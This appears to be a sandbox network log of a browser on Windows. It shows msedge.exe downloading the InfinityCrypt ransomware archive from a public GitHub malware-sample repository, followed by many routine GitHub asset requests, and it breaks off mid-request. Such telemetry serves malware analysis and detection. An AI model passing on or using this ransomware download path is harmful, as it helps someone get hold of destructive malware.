content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 177
x-github-request-id: F456:3129D7:19AE457:1C5A79A:66426EA3
-
GEThttps://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 302
date: Mon, 13 May 2024 19:49:01 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: F456:3129D7:19AE89F:1C5AC5B:66426EA4
-
Remote address:8.8.8.8:53Requestavatars.githubusercontent.comIN AResponseavatars.githubusercontent.comIN A185.199.108.133avatars.githubusercontent.comIN A185.199.109.133avatars.githubusercontent.comIN A185.199.110.133avatars.githubusercontent.comIN A185.199.111.133
-
Remote address:8.8.8.8:53Requestgithub.githubassets.comIN AResponsegithub.githubassets.comIN A185.199.108.154github.githubassets.comIN A185.199.110.154github.githubassets.comIN A185.199.111.154github.githubassets.comIN A185.199.109.154
-
Remote address:185.199.108.154:443RequestGET /assets/light-0f9c7cd68e73.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 08 May 2024 17:02:52 GMT
etag: 0x8DC6F80B2A1FC6D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 431611
x-served-by: cache-iad-kcgs7200096-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 104, 11565
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9c4a2b33f1a4599f0bd7215d177c196f9298e8dc
content-length: 7931
-
Remote address:185.199.108.154:443RequestGET /assets/global-ad129b4b6387.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 08 May 2024 15:50:24 GMT
etag: 0x8DC6F7693181484
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 434905
x-served-by: cache-iad-kiad7000166-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 46, 12776
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 18dccba9d01e3b3f55027b06ef7813ed3e8bfe8c
content-length: 49508
-
Remote address:185.199.108.154:443RequestGET /assets/primer-48c59db9c012.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Mon, 13 May 2024 15:22:57 GMT
etag: 0x8DC7360916F3F8B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 12316
x-served-by: cache-iad-kcgs7200051-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 43, 604
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 05c83e2c622e8c43406ef142b659c155f07994ef
content-length: 45056
-
Remote address:185.199.108.154:443RequestGET /assets/primer-primitives-03314b57bb48.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 08 May 2024 17:02:53 GMT
etag: 0x8DC6F80B30E9BFA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 431611
x-served-by: cache-iad-kiad7000053-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 115, 11994
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3295d6ab9d30fadba1ee3de25cf9eac812474f0d
content-length: 1727
-
Remote address:185.199.108.154:443RequestGET /assets/dark-13e7ced9cfd1.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 06 May 2024 17:49:12 GMT
etag: 0x8DC6DF4D6DB3DA7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 606431
x-served-by: cache-iad-kjyo7100143-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 76, 7864
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b3ff65276182228f510d32930f82050ae73b0504
content-length: 60683
-
Remote address:185.199.108.154:443RequestGET /assets/code-65d301a8c835.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 08 May 2024 17:02:49 GMT
etag: 0x8DC6F80B0B1B3B4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 431612
x-served-by: cache-iad-kcgs7200035-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 98, 11706
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d9877bd72be13c394648613b1ad2442fd2d3977f
content-length: 8010
-
Remote address:185.199.108.154:443RequestGET /assets/repository-2e900f0ac288.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 18 Apr 2024 03:20:17 GMT
etag: 0x8DC5F56788B489E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1024402
x-served-by: cache-iad-kiad7000080-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 73, 7789
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8f7403b6881c733857a69090d50bd68f30e3cf78
content-length: 6712
-
Remote address:185.199.108.154:443RequestGET /assets/github-909d3a6d1216.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Fri, 10 May 2024 20:35:53 GMT
etag: 0x8DC7130C9BDD9AA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 253712
x-served-by: cache-iad-kjyo7100143-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 68, 7102
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 18da2f2176e91770f38c78d4c2aa04ba20bbcf40
content-length: 24906
-
Remote address:185.199.108.154:443RequestGET /assets/react-lib-3a96fca5389a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 08 Feb 2024 11:06:17 GMT
etag: 0x8DC2895F91375BB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3208867
x-served-by: cache-iad-kjyo7100097-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 128, 43829
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d87af854d63e14e166f278fcd3fb51bd42d26e46
content-length: 4992
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-d9cd558a3443.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-d9cd558a3443.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 01 Apr 2024 17:53:37 GMT
etag: 0x8DC5274A8A28B5A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 873507
x-served-by: cache-iad-kjyo7100100-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 71, 7767
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fbc89e8193068b96708da74e8fd445c46bd208b0
content-length: 3614
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-541a38-c11d7563bc20.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-541a38-c11d7563bc20.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Mon, 13 May 2024 15:28:40 GMT
etag: 0x8DC73615E255629
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 12307
x-served-by: cache-iad-kjyo7100109-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 47, 392
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a6ed3658c84ab126fbccc2f2a9e171a4a961687f
content-length: 6670
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 12 Apr 2024 00:37:29 GMT
etag: 0x8DC5A88BBA8B5D8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 575537
x-served-by: cache-iad-kcgs7200049-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 69, 6
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d03c2eef13bcddd9f2af92934248adfdbc2c8026
content-length: 155069
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-ffa038d7f274.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-ffa038d7f274.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Fri, 10 May 2024 00:18:49 GMT
etag: 0x8DC7086C4266B8C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 12316
x-served-by: cache-iad-kiad7000029-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 38, 500
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1f47058e18efa64adeb034d9a5fc7b1e08fafb7b
content-length: 5841
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_node_modules_primer_octicons-react_dist_index_esm_mjs-8030d6011494.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_node_modules_primer_octicons-react_dist_index_esm_mjs-8030d6011494.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 18 Apr 2024 03:20:16 GMT
etag: 0x8DC5F5678220061
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 520670
x-served-by: cache-iad-kcgs7200107-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 68, 7776
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 17f2a68030cfdbc3d4e5d02e35e5ebb282fbd0e0
content-length: 6927
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-a9437e7d3d6a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-a9437e7d3d6a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 08 Apr 2024 04:48:31 GMT
etag: 0x8DC57872428093A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1041671
x-served-by: cache-iad-kcgs7200131-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 73, 7748
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3b24f062dee1004c86554ace191d0d886fe3c531
content-length: 6869
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-85a14b-3ddd3412665d.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-85a14b-3ddd3412665d.js HTTP/2.0
host: github.githubassets.com
